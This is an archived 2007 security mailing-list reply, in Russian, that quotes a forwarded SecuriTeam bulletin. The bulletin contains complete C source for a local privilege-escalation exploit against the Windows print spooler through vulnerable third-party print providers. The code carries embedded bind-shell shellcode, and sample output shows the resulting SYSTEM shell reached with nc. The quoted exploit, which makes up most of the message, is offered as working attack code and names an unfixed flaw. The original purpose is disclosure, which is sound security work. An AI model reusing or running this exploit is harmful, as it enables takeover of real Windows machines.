Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [security-alerts] FW: [EXPL] Universal Exploit for Vulnerable Printer Providers (Spooler Service)
Dear Kazennov, Vladimir,
Это для поставщиков печати, отличных от микрософтовского (Citrix,
Novell, разные не-микрософтовские LPRы и т.п.). И удаленной ошибку
назвать сложно. В общем к безопасности электронной почты точно отношения
не имеет :)
--Tuesday, January 30, 2007, 1:23:30 PM, you wrote to
security-alerts@xxxxxxxxxxxxxx:
>> -----Original Message-----
>> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
>> Sent: Monday, January 29, 2007 8:17 PM
>> To: html-list@xxxxxxxxxxxxxx
>> Subject: [EXPL] Universal Exploit for Vulnerable Printer
>> Providers (Spooler Service)
>>
>>
>>
>> Universal Exploit for Vulnerable Printer Providers (Spooler Service)
>>
>>
>>
>> A vulnerability in the way Printer Providers work allow local
>> attackers to cause the to crash and potentially execute
>> arbitrary code. The following exploit code can be used to
>> test your system.
>>
>>
>> Exploit:
>> /********************Private exploit- internal use
>> only*****************
>> Title: Universal exploit for vulnerable printer providers
>> (spooler service).
>> Vulnerability: Insecure EnumPrintersW() calls
>> Author: Andres Tarasco Acu a - atarasco@xxxxxx
>> Website:
>>
>>
>> This code should allow to gain SYSTEM privileges with the
>> following software:
>> blink !blink! blink!
>>
>> - DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED &
>> NOTFIXED -0day!!!
>> - Citrix Metaframe - cpprov.dll - FIXED
>> - Novell (nwspool.dll - CVE-2006-5854 - untested)
>> - More undisclosed stuff =)
>>
>> If this code crashes your spooler service (spoolsv.exe) check your
>> "vulnerable" printer providers at:
>>
>> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers
>>
>> Workaround: Trust only default printer providers "Internet
>> Print Provider"
>> and "LanMan Print Services" and delete the other ones.
>>
>> And remember, if it doesnt work for you, tweak it yourself.
>> Do not ask
>>
>>
>> D:\Programaci n\EnumPrinters\Exploits>testlpc.exe
>> [+] Citrix Presentation Server - EnumPrinterW() Universal exploit
>> [+] Exploit coded by Andres Tarasco - atarasco@xxxxxx
>>
>>
>> [+] Connecting to spooler LCP port \RPC Control\spoolss
>> [+] Trying to locate valid address (1 tries)
>> [+] Mapped memory. Client address: 0x003d0000
>> [+] Mapped memory. Server address: 0x00a70000
>> [+] Targeting return address to : 0x00A700A7
>> [+] Writting to shared memory...
>> [+] Written 0x1000 bytes
>> [+] Exploiting vulnerability....
>> [+] Exploit complete. Now Connect to 127.0.0.1:51477
>>
>>
>> D:\Programaci n\EnumPrinters>nc localhost 51477
>> Microsoft Windows XP [Versi n 5.1.2600]
>> (C) Copyright 1985-2001 Microsoft Corp.
>>
>> C:\WINDOWS\system32>whoami
>> NT AUTHORITY\SYSTEM
>>
>>
>> 514 ownz u
>> ********************Private exploit- internal use
>> only*****************/
>> #include <stdio.h>
>> #include <windows.h>
>> #include <Winspool.h>
>> #pragma comment(lib,"Winspool.lib")
>>
>>
>> #define REQUIRED_SIZE 0x1000
>>
>> unsigned char shellcode[] =
>> /*Just a metasploit shellcode - Bindshell 51477 */
>> "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe6"
>> "\xc0\xc6\x10\x83\xeb\xfc\xe2\xf4\x1a\xaa\x2d\x5d\x0e\x39\x39\xef"
>> "\x19\xa0\x4d\x7c\xc2\xe4\x4d\x55\xda\x4b\xba\x15\x9e\xc1\x29\x9b"
>> "\xa9\xd8\x4d\x4f\xc6\xc1\x2d\x59\x6d\xf4\x4d\x11\x08\xf1\x06\x89"
>> "\x4a\x44\x06\x64\xe1\x01\x0c\x1d\xe7\x02\x2d\xe4\xdd\x94\xe2\x38"
>> "\x93\x25\x4d\x4f\xc2\xc1\x2d\x76\x6d\xcc\x8d\x9b\xb9\xdc\xc7\xfb"
>> "\xe5\xec\x4d\x99\x8a\xe4\xda\x71\x25\xf1\x1d\x74\x6d\x83\xf6\x9b"
>> "\xa6\xcc\x4d\x60\xfa\x6d\x4d\x50\xee\x9e\xae\x9e\xa8\xce\x2a\x40"
>> "\x19\x16\xa0\x43\x80\xa8\xf5\x22\x8e\xb7\xb5\x22\xb9\x94\x39\xc0"
>> "\x8e\x0b\x2b\xec\xdd\x90\x39\xc6\xb9\x49\x23\x76\x67\x2d\xce\x12"
>> "\xb3\xaa\xc4\xef\x36\xa8\x1f\x19\x13\x6d\x91\xef\x30\x93\x95\x43"
>> "\xb5\x93\x85\x43\xa5\x93\x39\xc0\x80\xa8\x0f\x05\x80\x93\x4f\xf1"
>> "\x73\xa8\x62\x0a\x96\x07\x91\xef\x30\xaa\xd6\x41\xb3\x3f\x16\x78"
>> "\x42\x6d\xe8\xf9\xb1\x3f\x10\x43\xb3\x3f\x16\x78\x03\x89\x40\x59"
>> "\xb1\x3f\x10\x40\xb2\x94\x93\xef\x36\x53\xae\xf7\x9f\x06\xbf\x47"
>> "\x19\x16\x93\xef\x36\xa6\xac\x74\x80\xa8\xa5\x7d\x6f\x25\xac\x40"
>> "\xbf\xe9\x0a\x99\x01\xaa\x82\x99\x04\xf1\x06\xe3\x4c\x3e\x84\x3d"
>> "\x18\x82\xea\x83\x6b\xba\xfe\xbb\x4d\x6b\xae\x62\x18\x73\xd0\xef"
>> "\x93\x84\x39\xc6\xbd\x97\x94\x41\xb7\x91\xac\x11\xb7\x91\x93\x41"
>> "\x19\x10\xae\xbd\x3f\xc5\x08\x43\x19\x16\xac\xef\x19\xf7\x39\xc0"
>> "\x6d\x97\x3a\x93\x22\xa4\x39\xc6\xb4\x3f\x16\x78\x16\x4a\xc2\x4f"
>> "\xb5\x3f\x10\xef\x36\xc0\xc6\x10";
>>
>> typedef struct _UNICODE_STRING {
>> USHORT Length;
>> USHORT MaximumLength;
>> PWSTR Buffer;
>> } UNICODE_STRING;
>>
>>
>> typedef struct LpcSectionMapInfo{
>> DWORD Length;
>> DWORD SectionSize;
>> DWORD ServerBaseAddress;
>> } LPCSECTIONMAPINFO;
>>
>>
>> typedef struct LpcSectionInfo {
>> DWORD Length;
>> HANDLE SectionHandle;
>> DWORD Param1;
>> DWORD SectionSize;
>> DWORD ClientBaseAddress;
>> DWORD ServerBaseAddress;
>> } LPCSECTIONINFO;
>>
>>
>> #define SHARED_SECTION_SIZE 0x1000
>>
>> typedef struct _OBJDIR_INFORMATION {
>> UNICODE_STRING ObjectName;
>> UNICODE_STRING ObjectTypeName;
>> BYTE Data[1];
>> } OBJDIR_INFORMATION;
>>
>> typedef struct _OBJECT_ATTRIBUTES {
>> ULONG Length;
>> HANDLE RootDirectory;
>> UNICODE_STRING *ObjectName;
>> ULONG Attributes;
>> PVOID SecurityDescriptor;
>> PVOID SecurityQualityOfService;
>> } OBJECT_ATTRIBUTES;
>>
>> #define InitializeObjectAttributes( p, n, a, r, s ) { \
>> (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
>> (p)->RootDirectory = r; \
>> (p)->Attributes = a; \
>> (p)->ObjectName = n; \
>> (p)->SecurityDescriptor = s; \
>> (p)->SecurityQualityOfService = NULL; \
>> }
>>
>>
>> typedef DWORD (WINAPI *NTCREATESECTION)(
>> HANDLE* SectionHandle,
>> unsigned long DesiredAccess,
>> OBJECT_ATTRIBUTES *ObjectAttributes,
>> PLARGE_INTEGER MaximumSize,
>> unsigned long PageAttributess,
>> unsigned long SectionAttributes,
>> HANDLE FileHandle);
>>
>> typedef DWORD (WINAPI *NTCONNECTPORT)(
>> HANDLE *ClientPortHandle,
>> UNICODE_STRING *ServerPortName,
>> SECURITY_QUALITY_OF_SERVICE *SecurityQos,
>> DWORD *ClientSharedMemory,
>> DWORD *ServerSharedMemory,
>> DWORD *MaximumMessageLength,
>> DWORD *ConnectionInfo OPTIONAL,
>> DWORD *ConnectionInfoLength);
>>
>>
>> LARGE_INTEGER ConnectToLPCPort(void){
>> /* Thanks goes to Cesar Cerrudo for the WLSI paper */
>> HANDLE hPort;
>> LPCSECTIONINFO sectionInfo;
>> LPCSECTIONMAPINFO mapInfo;
>> byte ConnectDataBuffer[100];
>> DWORD Size = sizeof(ConnectDataBuffer);
>> WCHAR * uString=L"\\RPC Control\\spoolss";
>> DWORD i;
>> UNICODE_STRING uStr;
>> LARGE_INTEGER ret;
>>
>>
>> NTCONNECTPORT NtConnectPort;
>> NTCREATESECTION NtCreateSection;
>>
>> ret.QuadPart=0;
>> for (i=0;i<100;i++)
>> ConnectDataBuffer[i]=0x0;
>>
>>
>> NtConnectPort=
>> (NTCONNECTPORT)GetProcAddress(GetModuleHandle("NTDLL.DLL"),
>> "NtConnectPort");
>> NtCreateSection=
>> (NTCREATESECTION)GetProcAddress(GetModuleHandle("NTDLL.DLL"),
>> "NtCreateSection");
>>
>> if ( (!NtConnectPort) || (!NtCreateSection) ) {
>> printf("[-] Error Loading functions\n");
>> } else {
>> HANDLE hSection;
>> LARGE_INTEGER SecSize;
>> DWORD maxSize=0;
>> SECURITY_QUALITY_OF_SERVICE qos;
>> DWORD qosSize=4;
>>
>> //create shared section
>> SecSize.LowPart=REQUIRED_SIZE;//0x1000;
>> SecSize.HighPart=0x0;
>>
>> qos.Length =(DWORD)&qosSize;
>> qos.ImpersonationLevel =SecurityIdentification;
>> qos.ContextTrackingMode =0x01000101;
>> qos.EffectiveOnly =0x10000;
>>
>>
>> NtCreateSection(&hSection,SECTION_ALL_ACCESS,NULL,&SecSize,PAG
>> E_READWRITE,SEC_COMMIT ,NULL);
>>
>> //connect to lpc
>> memset(§ionInfo, 0, sizeof(sectionInfo));
>> memset(&mapInfo, 0, sizeof(mapInfo));
>>
>> sectionInfo.Length = 0x18;
>> sectionInfo.SectionHandle =hSection;
>> sectionInfo.SectionSize = SHARED_SECTION_SIZE;
>> mapInfo.Length = 0x0C;
>>
>> uStr.Length = wcslen(uString)*2;
>> uStr.MaximumLength = wcslen(uString)*2+2;
>> uStr.Buffer =uString;
>>
>> //connect to LPC port
>> if (!NtConnectPort(&hPort,&uStr,&qos,(DWORD
>> *)§ionInfo,(DWORD
>> *)&mapInfo,&maxSize,(DWORD*)ConnectDataBuffer,&Size)){
>> ret.LowPart=sectionInfo.ClientBaseAddress ;
>> ret.HighPart=sectionInfo.ServerBaseAddress;
>> }
>>
>>
>> }
>> return(ret);
>> }
>>
>> #define BOFSIZE 300 //Change it if size needed more to
>> exploit you printer provider
>>
>> int main(int argc, char* argv[])
>> {
>>
>> unsigned char exploit[BOFSIZE];
>> unsigned char buffer[REQUIRED_SIZE];
>> DWORD dwSizeNeeded,n=0;
>> DWORD datalen=REQUIRED_SIZE;
>> LARGE_INTEGER dirs;
>> HANDLE hProcess;
>> DWORD write;
>> char *p,i;
>> #define lpLocalAddress dirs.LowPart
>> #define lpTargetAddress dirs.HighPart
>>
>> printf("[+] Universal exploit for printer spooler providers\n");
>> printf("[+] Some Citrix metaframe, DiskAccess and Novel
>> versions are affected\n");
>> printf("[+] Exploit by Andres Tarasco - atarasco@xxxxxx\n\n");
>>
>> printf("[+] Connecting to spooler LCP port \\RPC
>> Control\\spoolss\n");
>> printf("[+] Trying to locate valid address");
>>
>>
>> do {
>> dirs=ConnectToLPCPort();
>> if (lpLocalAddress==0){
>> printf("[-] Unable to connect to spooler LPC port\n");
>> printf("[-] Check if the service is running\n");
>> exit(0);
>> }
>> i=lpTargetAddress>>24; // & 0xFF000000 == 0
>> n++;
>> if (n==100) {
>> printf("\n[-] Unable to locate a valid address after %i
>> tries\n",n);
>> printf("[?] Maybe a greater REQUIRED_SIZE should help.
>> Try increasing it\n");
>> return(0);
>> }
>> }while (i!=0);
>>
>> printf(" (%i tries)\n",n);
>>
>> printf("[+] Mapped memory. Client address:
>> 0x%8.8x\n",lpLocalAddress);
>> printf("[+] Mapped memory. Server address:
>> 0x%8.8x\n",lpTargetAddress);
>>
>>
>> i=(lpTargetAddress<<8)>>24;
>> //Fill all with rets. who cares where is it.
>> memset(exploit,i,sizeof(exploit));
>> exploit[sizeof(exploit)-1]='\0';
>>
>> /*
>> memset(exploit,'A',sizeof(exploit)-1);
>> exploit[262]= (lpTargetAddress<<8)>>24; //EIP for Diskaccess
>> exploit[263]= (lpTargetAddress<<8)>>24; //EIP for Diskaccess
>> exploit[264]='\0';
>> */
>>
>> printf("[+] Targeting return address to :
>> 0x00%2.2X00%2.2X\n",exploit[262],exploit[262]);
>>
>> p=(char *)lpLocalAddress;
>>
>> memset(&buffer[0],0x90,sizeof(buffer)-1);
>>
>> memcpy(&buffer[sizeof(buffer)-sizeof(shellcode)-10],shellcode,
>> sizeof(shellcode));
>>
>> printf("[+] Writting to shared memory...\n");
>> if ( (hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE,
>> GetCurrentProcessId()))!= NULL )
>> {
>> if ( WriteProcessMemory( hProcess, p, &buffer[0],
>> REQUIRED_SIZE, &write )!=0 )
>> {
>> printf("[+] Written 0x%x bytes \n",write);
>> printf("[+] Exploiting vulnerability....\n");
>> printf("[+] Exploit complete. Now try to connect to
>> 127.0.0.1:51477\n");
>> printf("[+] and check if you are system =)\n");
>> EnumPrintersA ( PRINTER_ENUM_NAME, (char *)exploit, 1,
>> NULL, 0, &dwSizeNeeded, &n );
>> return(1);
>> }
>> }
>> printf("[+] Something failed. Good luck next time\n");
>> return(0);
>> }
>>
>> // milw0rm.com [2007-01-29]
>>
>>
>> Additional Information:
>> The information has been provided by Andres Tarasco Acuca
>> <mailto:atarasco@xxxxxx> .
>> The original article can be found at:
>>
>>
>> ==============================================================
>> ==================
>>
>>
>>
>>
>>
>> This bulletin is sent to members of the SecuriTeam mailing list.
>> To unsubscribe from the list, send mail with an empty subject
>> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx
>> In order to subscribe to the mailing list and receive
>> advisories in HTML format, simply forward this email to:
>> html-list-subscribe@xxxxxxxxxxxxxx
>>
>>
>>
>> ==============================================================
>> ==================
>> ==============================================================
>> ==================
>>
>> DISCLAIMER:
>> The information in this bulletin is provided "AS IS" without
>> warranty of any kind.
>> In no event shall we be liable for any damages whatsoever
>> including direct, indirect, incidental, consequential, loss
>> of business profits or special damages.
>>
>>
>>
>>
>>
>>
--
~/ZARAZA
Неприятности начнутся в восемь. (Твен)
|
